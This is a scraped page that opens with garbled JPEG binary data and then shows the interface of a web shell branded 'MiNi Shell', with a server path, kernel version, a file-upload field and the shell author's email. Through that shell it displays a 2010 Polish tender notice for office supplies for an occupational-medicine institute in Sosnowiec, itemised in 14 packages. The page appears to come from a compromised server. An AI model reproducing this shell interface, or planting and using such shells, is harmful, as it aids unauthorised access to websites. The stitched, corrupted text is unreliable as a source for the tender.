JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100208/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100208/35422-N-2010.html

<p class="kh_header"><b>Sosnowiec: Sukcesywna dostawa artykułów biurowych dla Instytutu Medycyny Pracy i Zdrowia Środowiskowego w Sosnowcu</b><br>
<b>Numer ogłoszenia: 35422 - 2010; data zamieszczenia: 08.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Medycyny Pracy i Zdrowia Środowiskowego , ul. Kościelna 13, 41-200 Sosnowiec, woj. śląskie, tel. 032 2660885, faks 032 2661124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imp.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Badawczo- Rozwojowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów biurowych dla Instytutu Medycyny Pracy i Zdrowia Środowiskowego w Sosnowcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEDMIOT PRZETARGU:


Pakiet 1 
Lp.	Asortyment	Szacunkowe zapotrzebowanie na 24 ms. 
1.		Kalkulator 
12 pozycji wyświetlacz podwójny  wymiar 100x125x34	10szt
2.		Kalkulator    8pozycji wyświetlacz, obliczanie marży,wym. 107x127x32,7mm	10szt
3.		Przenośna  pamięć  USB 8GB	10szt
4.		Podkładka pod mysz	10szt




Pakiet 2 

Lp.	Asortyment	Szacunkowe zapotrzebowanie na 24 ms. 
1.		Taśma do pisania do  maszyny Optima	4szt
2.		Taśma korekcyjna maszynowa	4szt
3.		Kas Płyty CD - R 700 MB   pakowane po 100szt   	6op
4.		Pł P Płyta  CD-RW 700MB pakowane po 10szt	6op
a.	5	Ko  Koperta  papierowa do płyt CD	600szt
5.		Płyta DVD - R  pakowane po 100szt	2op
6.		Ściereczki nasączane do powierzchni plastikowych	10szt
7.		Okładki do bindowania błyszczące  250g/m2
Pakowane po 100szt	30 op
8.		KARTON do bindowania skóropodobna 150mic
pakowane po 100szt	30 op
9.		Gr   Grzbiety plastikowe do bindowania10mm  czarne
        pakowane po 100szt                       	2szt
10.		Gr  Grzbiety plastikowe do bindowania 12,5mm czarne
Pak          pakowane   po 100szt	6szt
11.		Gr   Grzbiety plastikowe do bindowania14mm  czarne
        pakowane po 100szt                       	2szt
12.		Gr Grzbiety plastikowe do bindowania 19mm czarne
Pakowane po 100szt	6szt





Pakiet 3

Lp.	Asortyment	Szacunkowe zapotrzebowanie na 24 ms. 
1.		Ws  wskaźnik laserowy NOBO 	4szt
2.		bloki do flipchartów gładki,kratka,	8szt
3.		Tab tablica korkowa  w ramie drewnianej  30x40	2szt
4.		tablica korkowa  w ramie drewnianej  50x80	2szt
5.		tablica korkowa  w ramie drewnianej   60x90	2szt
6.		tablica korkowa  w ramie drewnianej  120x80	2szt



Pakiet 4

Lp. 	Asortyment	Szacunkowe zapotrzebowanie na 24 ms. 
1.		Seg segregator A4  2 zaczepowy 
           grzbiet  szerokość  50mm    	300szt
2.		Seg segregator A4  2 zaczepowy 
   grzbiet  szerokość  75mm    	600szt
3.		Seg segregator A4  2 zaczepowy 
   grzbiet  szerokość  200-250mm 	60szt
4.		Seg segregator   A5  grzbietu  szerokość 75 mm        	30szt
5.		Sss  segregator A4 grzbiet szerokość.  350mm	20szt
6.		separatory kartonowe 1/3 A4  kolor  czerwony   niebieski, żółty ,zielony	40szt
7.		Prz  przekładki plastikowe format  A4  
  do     5 kart/ / 10 kart/ / 12 kart	po10szt
8.		Ko   koszulka A4  groszkowa bezbarwna o gr 110mic  pak  pakowana po 100szt	200op
9.		koszulka krystaliczna  A4 PP pakowane po 100szt	100szt
10.		skoroszyt PCV A4  zawieszany w  różnych  
kolorach  z przeźroczystą przednią okładką i kolorowym spodem, pakowany po10szt 	50szt
11.		ofertówka  krystaliczna A4 bezbarwna  z folii 
o gr.150mic pakowana po 25szt/obwoluta/	40szt
12.		Koszulka z klapką na rzep format A4 wym.
Wy wym235x16,4x322  pakowane po 3 szt	20szt
13.		Przekładki plastikowe format  A4  
  Literowe A-Z	20szt
14.		Me  Mechanizm skoroszytowy  umożliwia 
Spi spinanie luźnych kartek opakowanie 25 szt	10szt
15.		Sko Skoroszyt  A4  PCV w różnych kolorach  z
przeźroczystą przednią okładką i kolorowym spodem pakowany po 10 szt	30szt
16.		Teczka z rączką  szerokość grzbietu100mm	10szt
17.		Teczka  biała  z kartonu o gr 450g wiązana A4	500szt
18.		Teczka  biała  z kartonu o gr 450g z gumką A4	700szt
19.		Teczka z gumką wykonana z kartonu o gran. 350g 40     różne kolory  - lakierowana A4	100szt
20.		Teczka harmonijkowa z przegródkami	10szt


Pakiet 5

Lp.	Asortyment	Szacunkowe zapotrzebowanie na 24 ms. 
1.		pudełko archiwizacyjne  A4 grzbiet 88mm poj. 800 kartek  323x264x80mm 	10szt
2.		Pud  pudło archiwizacyjne  zbiorcze  431x333x294   
        gramatura 385g/m2 mieści 5 pudełek po 80mm        	5 szt
3.		 pojemniki kartonowy na czasopisma szerokość grzbietu 75 mm	50szt
4.		pojemnik PCV na czasopisma grzbiet 70mm	6szt
5.		Tec  teczka zawieszana A4  z kartonu o gramaturze          /m2   230g  z płóciennymi  boczkami 
 Bo    poj. 200  kartek	2000szt
6.		Pud   teczka skrzydełkowa A4 z sztywnej tektury  
         o grubości 2mm  	20szt







Pakiet 6 

Lp. 	Asortyment	Szacunkowe zapotrzebowanie na 24 ms. 
1.		Tec Książka A4 do RTG w twardej obwolucie
	20szt
2.		Książka do podpisu A4   10 przegródek  	10szt
3.		Książka korespondencyjna 192 kart  	20szt
4.		Książka korespondencyjna 96 kart   	10szt
5.		Przybornik na kartki  350szt format 90x90mm 
przeźroczysty	10szt
6.		Przybornik na biurko plastikowy 	10szt
7.		Półka biurowa przeźroczysta i dymna  na dokumenty	80szt

	


Pakiet 7



Lp.	Asortyment	Szacunkowe zapotrzebowanie na 24 ms. 
1.		Tusz do pieczątek     czarny, czerwony, niebieski	15szt
2.		Dziurkacz  biurowy, metalowy z linijką na min 50 kartek  	40szt
3.		Zszywacz biurowy na zszywki 24/6 , części mechaniczne wykonane z metalu  ładowany od góry system płaskiego zszywania   	40szt
4.		Zszywki   biurowe 24/6   pakowane po 1000szt 
w opakowaniu         	300op
5.		Zszywki   biurowe 26/6   pakowane po 1000szt 
w opakowaniu       	10op
6.		Zszywacz długoramienny, metalowy,skala dł. wyskalowana w cm, gwarancja 3 lata ,zszywa 10 kartek 24/6  ,26/6 	1szt
7.		Spinacze metalowe  okrągłe   małe wielkość 
28 mm  pakowane po 100szt      	300szt
8.		Spinacze  50 mmm owalne  pakowane po 100szt	100szt
9.		Nożyczki  biurowe ze stali nierdzewnej 
 o dł. 15,5cm  z rękojeścią z nie łamliwego  plastiku	30szt
10.		Nożyczki  biurowe ze stali nierdzewnej o  dł 21 cm  z rękojeścią z nie łamliwego  plastiku	20szt
11.		Nożyczki   z wymiennym ostrzem	10szt
12.		Ostrze do nożyków j.w.	10szt


Pakiet 8


Lp.	Asortyment	Szacunkowe zapotrzebowanie na 24 ms. 
1.		Sznurek jutowy  pakowany po 10dkg	50szt
2.		Papier pakowy szary arkusz o wymiarach 1mx70cm 	500szt

Pakiet 9
 
Lp.	Asortyment	Szacunkowe zapotrzebowanie na 24 ms. 
1.		Taśma pakowa przeźroczysta i brązowa  wym. 48mmx50m   samoprzylepna	200szt
2.		Taśma dwustronna pokryta klejem akrylowym  38mm x5m     	10szt
3.		Taśma dwustronna pokryta klejem akrylowym    50mmx5 m 	10szt
4.		Taśma biurowa  18mm x10m samoprzylepna	80szt
5.		Taśma biurowa  12mm x10m samoprzylepna	80szt
6.		Taśma biurowa   24mm x10m samoprzylepna	150szt
7.		Taśma dwustronna szer. 50 mm x5m samoprzylepna	10szt
8.		Taśma samoprzylepna  19mmx33m	4szt
9.		Taśma dwustronna szer. 18 mm x 5m samoprzylepna	10szt
10.		Klej w sztyfcie 15 g bezbarwny ,wysokiej jakości  posiada atest PZH
 do klejenia papieru, tektury, gwarancja 2 lata         	1000szt
11.		Klej w tubce poj. 40ml	15szt


Pakiet 10

Lp.	Asortyment	Szacunkowe zapotrzebowanie na 24 ms. 
1.		klipsy  metalowe do papieru 19mm  /12 szt/	200op
2.		Klipsy metalowe do papieru 25mm / 12szt/	180p
3.		Klipsy metalowe do papieru 32mm / 12szt/	200szt
4.		Klipsy  metalowe do papieru  50mm  /12szt/	60szt
5.		Magnesy na tablicę 10szt	15szt
6.		Pinezki do tablic   	10op
7.		Szpilki	5 op
8.		Pinezki 	6op
9.		Gumka do usuwania śladów ołówka	80szt
10.		Temperówka  pojedyncza ,stalowe ostrze, mocowane wkrętem, ostrze precyzyjnie połączone z obudową	20szt




Pakiet 11


Lp.	Asortyment	Szacunkowe zapotrzebowanie na 24 ms. 
1.		długopis   niebieski, plastikowy,  przeźroczysty 
z końcówką metalową	1000szt
2.		długopis czerwony plastikowy,  przeźroczysty 
z końcówką metalową	160szt
3.		długopis zielony plastikowy,  przeźroczysty 
z końcówką metalową	50szt
4.		długopis czarny  plastikowy,  przeźroczysty 
z końcówką metalową	10szt
5.		długopis  niebieski  na przycisk 	600szt
6.		długopis niebieski 	50szt
7.		długopis 	100szt
8.		 cienkopis kulkowy  Pilot  niebieski    	36szt
9.		  cienkopis  grubość linii 0,4mm nie gorszy
   niż w kolorach  niebieski czerwony,
    zielony	600szt
10.		  Pióro żelowy, niebieski ,czerwony, zielony,        	300szt
11.		 Marker czarny do szkła odporny na światło i wodę  dobrze kryjący końcówka 1mm       	40szt
12.		  Foliopisy  CD  szerokość 1 mm, wodoodporny	550szt
13.		 dermatografy kredki	10szt
14.		wkłady Zenit  niebieski i czerwone	100szt
15.		ołówek HB   	400szt
16.		grafit do ołówka automaty 0.5  HB	4szt
17.		grafit do ołówka automaty    0,9 HB	3szt
18.		grafit do ołówka automat   0.7 HB	1szt
19.		marker wodoodporny końcówka  ścięta i okrągła kolor czarny można pisać po każdego rodzaju powierzchni szerokość linii 1-5mm nietoksyczny jak 2160  Leviatan	700szt
20.		marker biały wodoodporny	10szt
21.		marker do opisywania pościeli wodoodporny	50szt
22.		zakreślacz  w 4 kolorach  	200szt
23.		korektor w taśmie  	10szt
24.		marker czerwony wodoodporny	10szt
25.		korektor w  płynie z pendzelkiem	300szt
26.		korektor w piórze  	20szt
27.		linijka 20cm   wykonana z najwyższej jakości polistyrenu	10szt
28.		linijka 30cm   wykonana z najwyższej jakości polistyrenu	10szt
29.		linijka 50cm   wykonana z najwyższej jakości polistyrenu	10szt
30.		Ekierka	10szt

Pakiet 12


Lp.	Asortyment	Szacunkowe zapotrzebowanie na 24 ms. 
1.		 koperta   biała B5  176x250 samoprzylepna
pakowana po 100szt	60op
2.		koperta  biała  B4 250x353 samoprzylepna pakowana po 100szt	150op
3.		koperta   biała C4 229x324 samoprzylepna, pakowana po 100szt	75op
4.		koperta    biała C6  114x162,samoprzylepne, pakowane po 1000 szt	220op
5.		koperta  biała C5 162x229,samoprzylepne,
pakowane po  100szt	125op
6.		koperta z rozszerzanym bokiem  biała 280x400x40 	2500szt.
7.		koperta szara 350x430  pakowane po 100szt	40op
8.		koperta szara 245x305 pakowane po 100szt	4 op
9.		koperta szara 180x245 pakowane po 100szt	4op
10.		koperta bąbelkowa  C5  /13 pakowane po 100szt	2op
11.		koperta bąbelkowa A4/17 / pakowane po 100szt	2op
12.		koperta DL  pakowana  po 100szt	4 op
13.		kostka biała 8.5x8.5x4    klejona   	10szt
14.		kostka biała 8.5x8.5x4    nieklejona  	50szt
15.		pojemnik plastikowy z wkładem 8.5x8.5 8.5 	10szt
16.		karteczki samoprzylepne 75x75 	400szt
17.		karteczki samoprzylepne  40x50/ 3 	150szt
18.		znaczniki  samoprzylepne w neonowych kolorach 5 bloczków 15x50 po 100 znaczników   	30szt
19.		strzałki indeksujące samoprzylepne w 4 kolorach   	20szt
20.		teczka A4 z klipem 	40szt
21.		deska A4 ze wzmocnionym klipem	16szt
22.		papier A4  granulacja 80g/mm  białość 166CIE do wysokonakładowych  drukarek i kopiarek  /ryza 500 arkuszy	      3500ryz
23.		papier A3 granulacja 80g/mm  do wysokonakładowych  drukarek i kopiarek  500arkuszy ryza	50ryz
24.		kalka maszynowa A4  niebieska ,czarna
50 arkuszy	10szt
25.		rolka do faksu    210 x30, pakowana po 6 rolek 	10op
26.		papier ksero format A5	10 ryz
27.		zeszyt  w  kratkę  A5  96 stron twarda okładka 	200szt
28.		zeszyt  w kratkę  A4 96 stron twarda  okładka	250szt
29.		zeszyt  B5  160 stron  twarda okładka	40szt
30.		zeszyt A5 32 str . kratka	10szt
31.		skorowidz A4 200 stron twarda okładka	10szt
32.		skorowidz A4  twarda okładka	10szt
33.		blok notatnikowyA4 z perforacja i dziurkami
100 kartkowy	60szt
34.		blok notatnikowy  A5 z perforacją , 50 kartek	40szt
35.		papier kolorowy samoprzylepny w bloku A4	10szt
36.		blok milimetrowy format A4 10 kart	40szt
37.		Kalka techniczna A4 pakowana po 100szt 70g	4op




Pakiet 13

Lp.	Asortyment	Szacunkowe zapotrzebowanie na 24 ms. 
1.		Kalendarz na biurko leżący 	100szt
2.		Kalendarz 1 planszowy	150szt
3.		Kalendarz trójdzielny	      100szt
4.		Terminarz książkowy A5 w twardej oprawie	100szt
5.		Biuwary z kalendarzem	20szt
   
                           
Pakiet 14


Lp.	Asortyment	Szacunkowe zapotrzebowanie na 24 ms. 
1.		Składanka komputerowa 240x12x2	24 szt.
2.		Składanka komputerowa 375x12x2	24 szt.
3.		Kupony RUM  do drukarki laserowej	10 szt.
4.		Woreczki strunowe 120x180mm	200 szt.
5.		Woreczki strunowe 300x400mm	200 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  przewiduje obowiązek wniesienia wadium w wysokości:

Pakiet 1-30 zł.
Pakiet 2-77 zł.
Pakiet 3-15 zł.
Pakiet 4-320 zł.
Pakiet 5-315 zł.
Pakiet 6-60 zł.
Pakiet 7-50 zł.
Pakiet 8-6 zł.
Pakiet 9-120 zł.
Pakiet 10-70 zł.
Pakiet 11-210 zł.
Pakiet 12-1.400,00 zł.
Pakiet 13-60 zł.
Pakiet 14-100 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
</li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.imp.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Sekretariacie Głównym IMPiZś, pok. 103, ul. Kościelna 13, Sosnowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2010 godzina 11:00, miejsce: w Sekretariacie Głównym IMPiZś, pok. 103, ul. Kościelna 13, Sosnowiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com